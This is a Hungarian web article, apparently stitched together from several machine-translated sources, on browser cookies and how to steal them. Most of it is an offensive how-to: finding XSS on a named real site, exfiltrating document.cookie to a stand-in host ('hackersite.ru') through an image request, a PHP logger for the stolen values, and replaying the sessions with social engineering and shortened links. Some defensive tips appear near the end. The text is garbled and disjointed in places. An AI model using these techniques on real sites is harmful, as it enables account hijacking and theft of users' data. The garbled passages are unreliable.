A barátom elfelejtette az egyik webhely jelszavát. Korábban azonban bejelölte az „Emlékezz rám” négyzetet a bejelentkezéskor. Google böngésző Chrome, amely lehetővé tette számára, hogy bejelentkezzen a webhelyre a fiókja alatt. Megkérdezték tőlem, hogy ez a mágikus állapot átvihető-e egy másik számítógépre. Helyesebb lenne persze megváltoztatni vagy visszaállítani a jelszót, de ezt az üggyel nem összefüggő okok miatt nem tudta megtenni az ismerős.

Hogyan használjuk az intercepter-ng-t bábokhoz

A modern szoftverek sokfélesége ellenére nehéz olyan programokat találni az Android számára, amelyek jobbak, mint az intercepter ng. Az első kritérium, amely a termék mellett szól, a tényleges teljesítmény. A legtöbb javasolt szippantó a hálózaton csak utánzat, amely nem látja el a deklarált funkciókat.

A következő pozitív tényező az alkalmazás sokoldalúsága és a felhasználók széles körének lefedettsége.

Számítógépes segítség 939-29-71

Kezdjük sorban. A cookie-k vagy „cookie-k” nagyon kis szövegfájlok – információkat tartalmazó könyvjelzők.

A webszerver elküldi ezeket az információkat a felhasználó böngészőjének. ahol ezeket az információkat a szükségességig tárolják. Nem egészen világos. Jól. RENDBEN.

Megpróbálom még könnyebbé tenni. Lát. bármelyik oldalon regisztráltál.

A regisztrációkor ezek a „sütik” jönnek létre.

Itt vannak.

Cookie Cadger

A program figyeli a WiFi hálózat forgalmát, elfogja a cookie-kat, és megismétli a felhasználó munkamenetét a böngészőben, megismételve a kéréseket a hitelesítő adataival. Matthew Sullivan szerző szeptember 30-án a derbyconi hackerkonferencián tartott előadást a programról. Közvetlenül a beszéd alatt Matthew Sullivan lehallgatta a konferencia egyik résztvevőjének nem biztosított, a Google-lal folytatott beszélgetését WiFi-n keresztül.

Hogyan lopjunk sütiket

Ha a webhely oldalon tartózkodva belép a címsor Firefox böngésző vagy Opera a következő szöveget: javascript:document.write(document.cookie); valami ilyesmit fog látni: remixAdminsBar=0; remixGroupType=0; remixpass=********************; remixfal=0; remixInformation=0; remixMembersBar=0; remix leírása=0; remixautobookmark=8; remixemail=*******; remixmid=23363; remixchk=5; remixaudios=0; remixlinksBar=1; remixOfficersBar=0; remixPhotosBar=0; remixTopicsBar=0; remixvideók=0; remixRecentNews=0; remixAlbumsBar=0 Figyelem! .

A webhelyek közötti szkriptelés teljes útmutatója

Az XSS egyfajta sebezhetőség szoftver, a webalkalmazásokban natív, amely lehetővé teszi a támadók számára, hogy kliensoldali szkriptet fecskendezzenek be a többi felhasználó által megtekintett weboldalakba. A Wikipédia XSS-hez a következő definícióval rendelkezik: „A webhelyek közötti szkriptezés (XSS) a webalkalmazásokban natív szoftversérülékenység egyik típusa (by a biztonsági korlátozások megkerülése böngésző)", amely lehetővé teszi a támadó számára, hogy kliensoldali szkriptet fecskendezzen be más felhasználók által megtekintett weboldalakra.

A cookie-k és a munkamenetek közötti különbség

Nem is olyan régen írtam egy cikket arról, hogyan kell regisztrálni és engedélyezni a felhasználókat az oldalon.

". Ebben a cikkben a munkamenetek és a cookie-k közötti különbséget fogom lebontani. hogy meghozza végső döntését.

Cookie-k. Nem, ez nem a cookie-król szól, hanem az Ön biztonságáról. Tehát valaki más számítógépén felkeresi kedvenc "vkontakte" webhelyét (vagy például leveleket néz meg), elutasítja a "jelszó mentése" opciót, boldogan átnézi a leveleket, és távozik. És ne gondolj arra a tényre, hogy a neved alatt most a címre léphetsz közösségi háló vagy postán.

Nem is gondolok egy olyan program helyzetére, amely megjegyzi a jelszót anélkül, hogy tudná. Ez már szándékos feltörés, és valószínűleg gyanítja, hogy ilyesmi megtörténhet, és nem fog ilyen számítógépen felkeresni kedvenc webhelyét. De beszélhetünk egyszerű emberi kíváncsiságról - barátokat látogattunk meg, aztán egyszer, és lehetőséget kapnak arra, hogy elolvassák a leveleit. Biztos vagy benne, hogy elutasítanak egy ilyen lehetőséget? Nem félsz, hogy közbejön valami? Mindenesetre félreteszem az erkölcsi kérdéseket, és csak arról beszélek, hogyan tárolódnak a számítógépen azok az információk, amelyeket most jelszókérés nélkül beengedhetnek valamelyik oldalra.

hogyan kell sütiket lopni

És ennek a technológiának a neve cookie-k.

És itt kezdődött minden. A http protokoll, amelyen valójában webhelyeket böngész (beleértve ezt is), kezdetben nem jelentette a kapcsolat fenntartásának lehetőségét. Ez azt jelenti, hogy durván fogalmazva kérést küld az oldalnak, választ kap, ez megjelenik a képernyőn, majd a szerver nem emlékszik semmire Önről. Persze ez akkor jó, ha az oldal pusztán információs és nem emlékezhet rólad semmire, de a Web 2.0 korát éljük írja be őket az adatbázis adataiba, de ez nem elég.

Nézzünk egy nagyon egyszerű példát. Fórum. Tehát regisztráltál, és a fórumon van egy bejegyzés, hogy van ilyen-olyan felhasználó ilyen-olyan jelszóval és még néhány további adattal. De most felkeresi a fórumot, és bejelentkezik - írja be a jelszavát. Valahol lennie kell olyan információnak, hogy be vagy jelentkezve. A szerveren? Természetesen nem! Lehetetlen elmenteni a szerverre arról, hogy az engedélyezés az Ön számítógépéről történt - nem fogja tudni megkülönböztetni Önt valaki mástól (még az Ön IP-címe sem azonosítja egyedileg)! Így az engedélyezés megtörténtére vonatkozó információkat a számítógépén kell tárolni. Erre valók a sütik, erre készültek.

A cookie egy kis rekord az Ön számítógépén, amely információkat tárol a meglátogatott webhelyről. Engedélyezéskor létrejön egy hasonló bejegyzés, amely után már körbejárhatod a fórumot, és az felismer. Ez azonban már automatikusan megtörténik - a cookie-ban tárolt információknak köszönhetően -, így ha úgy tesz, mintha Ön lenne a fórum fő adminisztrátora, az továbbra sem működik a jelszó-ellenőrzés megkerülésével.

Most visszatérhetünk oda, ahol ez a cikk kezdődött. Ha bejelentkezett valahova anélkül, hogy elmentette volna a jelszavát, akkor előfordulhat, hogy olyan bejegyzés jött létre a számítógépen, amely lehetővé teszi, hogy engedély nélkül adja meg ezt az erőforrást a neve alatt. Egy ilyen bejegyzés maga egy idő után elavulttá válik, de kényszerítheti a törlését. Minden böngésző másképp csinálja ezt, a kedvencemben megmutatom, hogyan kell csinálni Google Chrome. A lehetőségek megnyitása

Lépjen a "Speciális" fülre, és keresse meg a "sütik megjelenítése" gombot

Most természetesen törölheti az összes cookie-t, de ez felzaklathatja a számítógép tulajdonosát. Ezért például a felső mezőbe beírhatja az Önt érdeklő oldal nevét

Ekkor csak az oldalhoz kapcsolódó cookie-k törölhetők. Kipróbálhatod az enyémet. Sőt, ha bejelentkezik a fórumomba, majd törli a cookie-kat, akkor az engedélyezési információk elfelejtődnek. Próbáld ki!

a megjegyzéseket működteti

1. Mi az XSS
Az XSS típusú biztonsági rés tetszőleges JavaScript-kód beszúrását teszi lehetővé az oldal törzsébe. XSS támadás abban különbözik a többitől (pl. SQL injekció vagy PHP injekció), hogy nem a szerverre, hanem a kliensre hat.

hogyan kell sütiket lopni

Segítségével nem lehet adatbázistáblákat megtekinteni, shellt feltölteni stb. Az XSS leggyakoribb használata a cookie-k ellopása.
Cookie-k (Cookie-k) - egy webszerver által létrehozott kis adat, amelyet a felhasználó számítógépén fájlként tárolnak. Általában a cookie-kat fiókok tárolására használják, és leggyakrabban kódolt jelszót, bejelentkezési nevet és munkamenet-azonosítót tartalmaznak. (Bár nem mindig)
Az XSS két típusa van, aktív és passzív.

Passzív XSS megköveteli az áldozattól a közvetlen részvételt, például kövesse a JavaScript kódot tartalmazó linket. Az ilyen típusú XSS használatakor nem nélkülözheti az SI-t (Social Engineering)

Aktív XSS nem igényel semmilyen részvételt az áldozattól, csak fel kell lépnie az oldalra az XSS-sel. Aktív XSS lehet például fórumbejegyzésekben, chatekben, hírek hozzáadásakor stb.

2. Keresés az XSS-ben
Ebben a bekezdésben elmondom, hogyan találja meg az xss-t

2.1 Passzív XSS
A passzív XSS megtalálásához csak helyettesítse be a beviteli űrlapot ha a szkript működött, és megjelent az "xss" üzenet, akkor a sérülékenység fennáll, ha a szkript nem működött, akkor is próbálkozhat ">, valószínűleg ez a leggyakoribb xss biztonsági rés. Ha sem az egyik, sem a másik szkript nem működött, akkor valószínűleg nincs sebezhetőség.
Nézzünk egy példát.
http://miss.rambler.ru/srch/?sort=0& … amp;words=
Látod a "keresés" űrlapot? tedd be oda ">és kattintson a "Keresés" gombra
Egy xss-t tartalmazó ablak kirepült, ami azt jelenti, hogy xss van jelen. (Talán, amikor ezt a cikket olvastad, ez az xss már javítva lesz.)

2.2 Aktív XSS
Ilyen CSS lehet például a profilmezőkben, amikor hírt ad hozzá a hír nevében és magában a hírben (ritkábban), a fórumok / chat / vendégkönyvek üzeneteiben, ahol a html engedélyezve van. Itt minden egyszerű, a mezőkbe beírjuk az előző albekezdésből származó szkriptet, és ha az üzenet megjelenik a képernyőn, akkor a sérülékenység jelen van.
Vegye figyelembe az xss-t a BB címkékben a fórumokon.
Megpróbálhatsz hülyén beszúrni javascript kódot a címkébe, így:
javascript:alert('xss')
Néhány címkének vannak paraméterei, például a címkének dynsrc és lowsrc paraméterei vannak, próbáljuk meg a kódot így helyettesíteni:
http://www.site.ru/image.jpg dynsrc=javascript:alert('xss')
Ha a szkript működött, az xss az

3. XSS használata cookie-k ellopásához
Most a legfinomabb
A cookie-k ellopásához szükségünk van egy websnifferre, telepíthetsz valamilyen szippantót a tárhelyedre, vagy használhatsz online szippantót, amely most megtelt.
A passzív XSS-en keresztüli cookie-k ellopásához az áldozatnak mérgező linket kell követnie. A cookie-k ellopásához ehelyett használjuk másik szkript:
helyettesítjük a forgatókönyvet a linkben, és hagyjuk, hogy az áldozat kövesse azt, nézze meg a szippantónaplót és örüljön.
Nézzünk egy példát.
Vegyük azt az XSS-t a rambler-en az előző bekezdésből.
Paszta
">
a keresési űrlapon kattintson a "Keresés" gombra, nézze meg a címsort, és nézze meg:

http://miss.rambler.ru/srch/?sort=0& … &words =">
Ezt a linket odadobjuk az áldozatnak, és élvezzük a sütiket.
Egy ilyen hivatkozást látva az áldozat gyanakodhat valamire, ezért célszerű kódolni
">
URL-ben Vagy használjon olyan szolgáltatásokat, mint a http://tinyurl.com/
Térjünk át az aktív XSS-re, itt minden egyszerű, az alert() helyett img = new Image(); img.src = "sniffer image address"+document.cookie;

Most sütiket kaptunk. De mit kezdjünk velük? Egyszerű, a sajátjuk helyett ezeket kell helyettesíteni. NÁL NÉL Opera böngésző van beépített sütiszerkesztő (tools-> advanced-> cookie management), van egy plugin a firefoxhoz (nem emlékszem a nevére, használd a google-t)
Egyelőre ennyi, talán kiegészül a cikk

Arra a kérdésre, hogy hogyan szerezzünk COOKIES cookie-kat. Sütire van szüksége, hogyan kell megszerezni, kérem, mondja meg!!! 1 a szerző által beállított Vlad eeeeeeeeeeeeeee a legjobb válasz az Mik azok a sütik?
A tény az, hogy a www-technológiák fejlesztése és a programozási nyelvek internetes bevezetése során egy nagyon komoly probléma merült fel a programok fejlesztői előtt - hogyan lehet menteni az algoritmus végrehajtásának eredményeit minden egyes felhasználó számára. hosszú ideje? A HTTP protokoll önmagában nem képes a szoftverfolyamatok eredményeinek rögzítésére. A szekciók használata szintén nem jelent megoldást a problémára, mivel a kiszolgálóval való kapcsolat megszakadása után azonnal leáll a művelet.
A problémát a cookie-k (vagyis az angol fordításban "cookie") bevezetésével sikerült megoldani. A cookie-knak van egy figyelemre méltó tulajdonságuk - a felhasználó merevlemezén tárolódnak, és szinte korlátlan ideig tárolhatók.
Lényegében a cookie-k egyszerű szöveges fájlok, amelyeket a böngésző által használt speciális könyvtárban tárolnak (általában ideiglenes internetes fájlok néven), és ebbe a könyvtárba lépve megtekintheti őket ( gyors hozzáférés hozzá az IE böngészőhöz az Eszközök -> Internetbeállítások -> Ideiglenes internetes fájlok -> Beállítások -> Nézet menüponton keresztül hajtható végre.
Egyes cookie-k csak egy munkamenetre tárolhatók, a böngésző bezárása után törlődnek. Mások, meghatározott időre beállítva, egy fájlba íródnak. Általában ezt a fájlt "cookies.txt"-nek hívják (de több is lehet), és a számítógépre telepített böngésző munkakönyvtárában található.
más szavakkal
A cookie egy kis szöveges információ, amelyet a szerver küld a böngészőnek. A cookie-k önmagukban nem tudnak mit tenni, de amikor a felhasználó belép a szerverre (beírja a címét a böngésző sorába), a szerver ki tudja olvasni a sütikben található információkat, és annak elemzése alapján bármilyen műveletet végrehajtani. Például abban az esetben, ha valamihez a weben keresztül jogosult hozzáférni, a bejelentkezési név és a jelszó a munkamenet során cookie-kba kerül tárolásra, ami lehetővé teszi, hogy a felhasználó ne adja meg újra azokat az egyes jelszóval védett dokumentumok kérésekor.
Ha ezen a témakörön keresztül próbál hozzáférni valaki más jelszóval védett fiókjaihoz, akkor távolról (trójai) vagy szemtelenül flash meghajtóra másolással meg kell találnia a módját, ha hozzáfér ahhoz a számítógéphez, ahol az áldozat dolgozik, másolja ki ezt a cookie.txt fájlt, és cserélje ki (ugyanabban a böngészőjében). Ezután megy a kívánt webhelyre, ahol a fiók érdekli, és automatikusan hozzáférést kap. Ne feledje azonban, hogy ha az áldozat a munka végén megnyomja a fiókból (például a levélből) a kilépést, akkor a munkamenet információi törlődnek a cookie-kból, és Ön nem fog hozzáférni.
A Mozilla Firefox cookie-kat tárol a felhasználói profilban, a C:Documents and Settings fájlbanUsernameApplication DataMozillaFirefoxProfiles<имя профиля>cookies.txt
Az nternet explorer ezeket a sütiket külön szöveges fájlként menti a C:Documents and SettingsUsernameCookies mappába
Az Opera a cookie-kat a C:Documents and Settings UsernameApplication DataOperaOperaprofilecookies4.dat fájlban tárolja

Cookie-k - a weboldal által a felhasználó számítógépén tárolt információ szöveges fájl formájában. Hitelesítési adatokat tartalmaz (bejelentkezési név/jelszó, azonosító, telefonszám, cím postafiók), felhasználói beállítások, hozzáférési állapot. A böngésző profiljában tárolva.

Cookie hack a látogató munkamenetének ellopása (vagy „eltérítése”) egy webes erőforráshoz. A titkos információ nemcsak a feladó és a címzett számára válik elérhetővé, hanem egy harmadik fél – a lehallgató személy – számára is.

Cookie-hackelési eszközök és technikák

A számítógéptolvajoknak, akárcsak a való életben dolgozó kollégáik, a készségek, ügyesség és tudás mellett természetesen saját eszközeik is vannak - a mesterkulcsok és szondák egyfajta arzenálja. Ismerkedjünk meg a hackerek legnépszerűbb trükkjeivel, melyekkel sütiket halásznak ki az internet lakóitól.

Szimatolók

Különleges programok a hálózati forgalom figyelésére és elemzésére. Nevük az angol "sniff" (sniff) igéből származik, mert. szó szerint "kiszimatolja" a csomópontok között továbbított csomagokat.

A támadók azonban szippantót használnak a munkamenetadatok, üzenetek és egyebek lehallgatására bizalmas információ. Támadásaik tárgyát többnyire nem biztonságos hálózatok jelentik, ahol a cookie-k nyílt HTTP-munkamenetben kerülnek elküldésre, vagyis gyakorlatilag nincsenek titkosítva. (A nyilvános Wi-Fi a legsebezhetőbb.)

A következő módszereket használják a szippantás beszúrására a felhasználó gazdagépe és a webszerver közötti internetes csatornába:

  • hálózati interfészek (hubok, kapcsolók) „hallgatása”;
  • forgalom elágazása és másolása;
  • kapcsolat a hálózati csatorna megszakadásával;
  • elemzés speciális támadásokon keresztül, amelyek átirányítják az áldozat forgalmat egy szippantóhoz (MAC-spoofing, IP-spoofing).

Az XSS rövidítés a Cross Site Scripting rövidítése. Weboldalak támadására használják felhasználói adatok ellopása érdekében.

Az XSS működése a következő:

  • a támadó rosszindulatú kódot (speciális álcázott szkriptet) fecskendez be egy webhely, fórum weboldalára vagy üzenetbe (például, amikor egy közösségi hálózaton cseveg);
  • az áldozat felkeresi a fertőzött oldalt és aktiválja állítsa be a kódot számítógépén (kattint, követ egy hivatkozást stb.);
  • viszont az aktivált rosszindulatú kód „kivonja” a felhasználó bizalmas adatait a böngészőből (különösen a cookie-kat), és elküldi azokat a támadó webszerverére.

Egy szoftveres XSS-mechanizmus „beültetése” érdekében a hackerek a webszerverek, online szolgáltatások és böngészők mindenféle sebezhetőségét használják fel.

Az összes XSS sebezhetőség két típusra osztható:

  • Passzív. A támadás egy adott weboldal szkriptjének lekérdezésével érhető el. Rosszindulatú kód különféle formában beírható egy weboldalon (például egy webhely keresősávjába). A passzív XSS-re a leginkább érzékenyek azok az erőforrások, amelyek nem szűrik a HTML-címkéket az adatok beérkezésekor;
  • Aktív. Közvetlenül a szerveren található. És aktiválódnak az áldozat böngészőjében. A csalók aktívan használják őket különféle blogokban, chatekben és hírfolyamokban.

A hackerek gondosan "álcázzák" XSS-szkripteiket, hogy az áldozat ne gyanítson semmit. Megváltoztatják a fájl kiterjesztését, képként adják át a kódot, motiválják őket a hivatkozás követésére, érdekes tartalommal vonzzák őket. Ennek eredményeként: egy PC-felhasználó, aki nem birkózott meg saját kíváncsiságával, saját kezével (egérkattintással) session cookie-kat küld (bejelentkezési névvel és jelszóval!) Az XSS-szkript szerzőjének - egy számítógépes gazembernek.

Cookie-hamisítás

Minden süti tárolása és elküldése a webszervernek (ahonnan "érkeztek") változtatás nélkül – eredeti formájában – azonos értékekkel, karakterláncokkal és egyéb adatokkal történik. Paramétereik szándékos módosítását cookie-spoofingnak nevezik. Más szóval, amikor egy sütit hamisítanak, a támadó vágyálom. Például egy webáruházban történő fizetéskor a fizetés összege a cookie-ban kisebb oldalra módosul – így „megtakarítás” keletkezik a vásárlásokon.

A közösségi hálózaton valaki más fiókjából ellopott munkamenet-cookie-k „beszúródnak” egy másik munkamenetbe és egy másik számítógépre. Az ellopott süti tulajdonosa megkapja teljes hozzáférés az áldozat fiókjába (levelezés, tartalom, oldalbeállítások) mindaddig, amíg az oldalán van.

A cookie-k "szerkesztése" a következőkkel történik:

  • "Cookie-k kezelése..." funkciók az Opera böngészőben;
  • kiegészítők Cookies Manager és Advanced Cookie Manager for FireFox;
  • IECookiesView segédprogramok (csak Internet Explorerhez);
  • szöveg szerkesztő mint az AkelPad, a Jegyzettömb vagy a Windows jegyzettömb.

Fizikai hozzáférés az adatokhoz

Magasan egyszerű áramkör megvalósítása több lépésből áll. De ez csak akkor hatékony, ha az áldozat számítógépe nyílt ülésszak, például a Vkontakte, felügyelet nélkül marad (és elég sokáig!):

  1. Lépjen be a böngésző címsorába javascript függvény, amely megjeleníti az összes mentett cookie-t.
  2. Az "ENTER" megnyomása után mindegyik megjelenik az oldalon.
  3. A sütiket a rendszer másolja, fájlba menti, majd flash meghajtóra továbbítja.
  4. Egy másik számítógépen a sütiket új munkamenetben cserélik le.
  5. Megnyílik az áldozat számlájához való hozzáférés.

Általános szabály, hogy a hackerek a fenti eszközöket (+ egyebeket) kombinálva (mivel a védelmi szint sok webes erőforráson meglehetősen magas), és külön-külön is (ha a felhasználók túlságosan naivak) használják.

XSS + szippantó

  1. Létrejön egy XSS-szkript, amely megadja az online szippantó címét (saját gyártású vagy egy adott szolgáltatás).
  2. A rosszindulatú kód .img kiterjesztéssel (képformátum) kerül mentésre.
  3. Ezután ez a fájl feltöltődik a webhely oldalára, csevegésre vagy személyes üzenetre - ahol a támadást végrehajtják.
  4. A felhasználó figyelmét felhívja a létrehozott „csapda” (itt a social engineering jön szóba).
  5. Ha a „csapda” működik, az áldozat böngészőjéből származó cookie-kat a szippantó elfogja.
  6. A keksz kinyitja a szippantó naplókat, és kiszedi az ellopott sütiket.
  7. Ezután a fenti eszközökkel helyettesítést hajt végre, hogy megszerezze a fióktulajdonos jogait.

A cookie-k védelme a hackelés ellen

  1. Használjon titkosított kapcsolatot (megfelelő protokollok és biztonsági módszerek használatával).
  2. Ne válaszoljon kétes linkekre, képekre, csábító ajánlatokra, hogy megismerkedjen az "új ingyenes szoftverrel". Főleg idegenektől.
  3. Csak megbízható webes forrásokat használjon.
  4. A "Kijelentkezés" gomb megnyomásával fejezze be az engedélyezett munkamenetet (és ne csak zárja be a lapot!). Főleg, ha nem volt bejelentkezve a fiókba személyi számítógép, hanem például egy internetkávézóban lévő PC-ről.
  5. Ne használja böngészője „Jelszó mentése” funkcióját. A tárolt regisztrációs adatok időnként növelik a lopás kockázatát. Ne legyen lusta, ne szánjon néhány percet a jelszó megadására és a bejelentkezésre minden munkamenet elején.
  6. A webes böngészés után – közösségi hálózatok, fórumok, csevegések, webhelyek meglátogatása – törölje a mentett sütiket és ürítse ki a böngésző gyorsítótárát.
  7. Rendszeresen frissítse a böngészőket és a víruskereső szoftvereket.
  8. Használjon olyan böngészőbővítményeket, amelyek védelmet nyújtanak az XSS-támadások ellen (például NoScript for FF és Google Chrome).
  9. Időnként a számlákban.

És ami a legfontosabb - ne veszítse el az éberséget és a figyelmet, miközben pihen vagy dolgozik az interneten!

Mi az a süti?

Létezik egy mechanizmus, amely lehetővé teszi a http-kiszolgáló számára, hogy néhányat a felhasználó számítógépén tároljon szöveges információk majd lépjen kapcsolatba vele. Ez az információ sütinek hívják. Valójában minden cookie egy pár: a paraméter neve és értéke. Minden cookie-hoz hozzá van rendelve a domain, amelyhez tartozik. Biztonsági okokból minden böngészőben a http szerver csak a saját domain cookie-jához férhet hozzá. Ezen túlmenően a cookie-knak lejárati dátuma is lehet, amely esetben a számítógépen addig a dátumig tárolódnak, még akkor is, ha minden böngészőablak be van zárva.


Miért fontosak a sütik?

Minden többfelhasználós rendszerben sütiket használnak a felhasználó azonosítására. Illetve a felhasználó aktuális kapcsolata a szolgáltatással, a felhasználói munkamenet. Ha valaki felismeri a sütiket, bejelentkezhet az Ön nevében. Mert be Ebben a pillanatban nagyon kevés internetes forrás ellenőrzi az IP-cím változását egy felhasználói munkamenet során.


Hogyan lehet módosítani vagy módosítani a cookie-kat?

A böngészőfejlesztők nem biztosítanak beépített eszközöket a cookie-k szerkesztéséhez. De meg lehet boldogulni egy rendes jegyzettömbbel (jegyzettömbbel).


1. lépés: hozzon létre szöveges fájl szöveggel

ablakok Rendszerleíróadatbázis-szerkesztő 5.00 verzió



@="C:\\IE_ext.htm"

Elmentjük IE_ext.reg néven

2. lépés: A létrehozott fájl segítségével módosítsa a Windows rendszerleíró adatbázisát.

3. lépés: hozzon létre egy szöveges fájlt szöveggel

< script language="javascript">
external.menuArguments.clipboardData.setData("Szöveg" , external.menuArguments.document.cookie);

external.menuArguments.document.cookie= "tesztnév=tesztérték; elérési út=/; domain=tesztdomain.ru";
alert(external.menuArguments.document.cookie);


Mentse el C:\IE_ext.htm néven

4. lépés: Megyünk a számunkra érdekes webhelyre.

5. lépés: Jobb klikk rákattint az egérrel szabad hely oldalt, és válassza ki a menüpontot "Munka a sütikkel". Hozzáférés engedélyezése a vágólaphoz. Az ehhez a webhelyhez tartozó cookie-k a vágólapra kerülnek. Beillesztheti a jegyzettömbjüket (jegyzettömb), és megnézheti.


6. lépés: Egy cookie módosításához szerkessze a C:\IE_ext.htm fájlt, cserélje ki tesztnév a süti nevében, tesztérték- jelentéséről, tesztdomain.com- a webhely domainjére. Ha szükséges, adjon hozzá további ilyen sorokat. Az irányítás kényelme érdekében a módosítás előtt és után hozzáadtam az aktuális cookie-k kimenetét a szkripthez: alert(external.menuArguments.document.cookie);

7. lépés: Futtassa újra az 5. lépést, majd frissítse az oldalt.

A lényeg: frissített sütikkel fogunk menni ehhez az internetes forráshoz.

Hogyan lehet sütiket ellopni JavaScript segítségével?

Ha a támadónak sikerült lehetőséget találnia egy tetszőleges JavaScript-szkript futtatására az áldozat számítógépén, akkor olvassa el aktuális sütik nagyon könnyen tudja. Példa:


varstr=document.cookie;

De vajon képes lesz-e átvinni ezeket a webhelyére, mert amint arra korábban utaltam, egy JavaScript szkript nem képes további megerősítés hozzáfér egy másik domainben található webhelyhez? Kiderült, hogy egy JavaScript-szkript bármilyen http-kiszolgálón található képet betölthet. Ezzel egyidejűleg vigye át a letöltési kérelemben szereplő szöveges információkat erre a képre. Példa: http://hackersite.ru/xss.jpg?text_info Tehát ha ezt a kódot futtatod:

varimg= Új kép();

img.src= "http://hackersite.ru/xss.jpg?"+ encodeURI(document.cookie);


akkor a süti a „kép” letöltésére és a támadónak való „hagyásra” vonatkozó kérésben lesz.

Hogyan kell kezelni az ilyen „kép” feltöltési kéréseket?

A támadónak csak tárhelyet kell találnia php támogatásés ehhez hasonló helykód:

$uid=urldecode($_SZERVER["QUERY_STRING"]);
$fp=fopen("log.txt","a");
fputs($fp,"$uid\n");
fclose($fp);
?>

Ezután a szkripthez tartozó összes lekérdezési paraméter a fájlba kerül log.txt. Csak a korábban leírt JavaScript-szkriptben marad a csere http://hackersite.ru/xss.jpg a php szkript elérési útjára.


Eredmény

Csak az XSS sebezhetőségeinek kihasználásának legegyszerűbb módját mutattam be. De ez azt bizonyítja, hogy legalább egy ilyen sebezhetőség jelenléte egy többfelhasználós internetes webhelyen lehetővé teheti a támadó számára, hogy az erőforrásait az Ön nevében használja.

Az Opera nyissa meg a főmenüt, lépjen a "Beállítások" szakaszba, és válassza ki a " sort Általános beállítások...". És csak melegen nyomhatod CTRL billentyűk+ F12. Ezzel megnyílik a böngésző beállítási ablaka, ahol a "Speciális" lapon a bal oldali ablaktáblában a "Cookie-k" szakaszra kell kattintania. Ebben rá kell kattintania a "Cookie-k kezelése" gombra.

NÁL NÉL Mozilla Firefox nyissa meg az "Eszközök" részt a menüben, és válassza a "Beállítások" elemet. A beállítások ablakban lépjen az "Adatvédelem" fülre, keresse meg ott a "Show Cookies..." gombot, és kattintson rá a böngésző által tárolt cookie-k listájának eléréséhez. Itt lehet őket keresni és megtekinteni.

Az Internet Explorerben bontsa ki az "Eszközök" részt a menüben, és válassza a "Tulajdonságok" lehetőséget. A tulajdonság beállításai ablakban lépjen az Általános lapra, és kattintson a Beállítások gombra a Böngészési előzmények részben. Ily módon megnyílik egy másik ablak („Ideiglenes fájlok beállításai”), amelyben a „Fájlok megjelenítése” gombra kell kattintania.

A megnyíló Internet Explorer ideiglenes fájlok mappájának tartalomjegyzékében kattintson a "Név" címszóra - így az összes cookie-t egy blokkba csoportosíthatja, egy közös heterogén fájlok halomba. Itt megtalálhatja a kívánt fájlt, és megnyithatja egy szabványos Jegyzettömbben megtekintés vagy szerkesztés céljából.

A Google Chrome böngészőben kattintson az ablak jobb felső sarkában található csavarkulcs ikonra, és válassza a menü Opciók menüpontját. A böngésző megnyitja a "Beállítások" oldalt, és a bal oldali ablaktáblájában kattintson a "Speciális" hivatkozásra, a speciális beállítások oldalon pedig a "Tartalombeállítások" gombra. Még nem az utolsó oldal a böngésző által tárolt cookie-k felé vezető úton.

Kattintson a következő oldalon az "Összes cookie és webhelyadat" gombra, és végre hozzáférhet a cookie-k listájához.

A Google Chrome lehetővé teszi a cookie-k keresését, megtekintését és törlését.

A Safari böngészőben kattintson a fogaskerék ikonra a jobb oldalon felső sarokés válassza ki a "Beállítások ..." sort. A beállítások módosítására szolgáló ablakban a "Biztonság" fülre kell lépnie, hogy ott kattintson a "Cookie-k megjelenítése" gombra. A Safari csak a cookie-k kereséséhez és törléséhez biztosít funkciókat, ezen ideiglenes fájlok tartalma itt csak részben látható.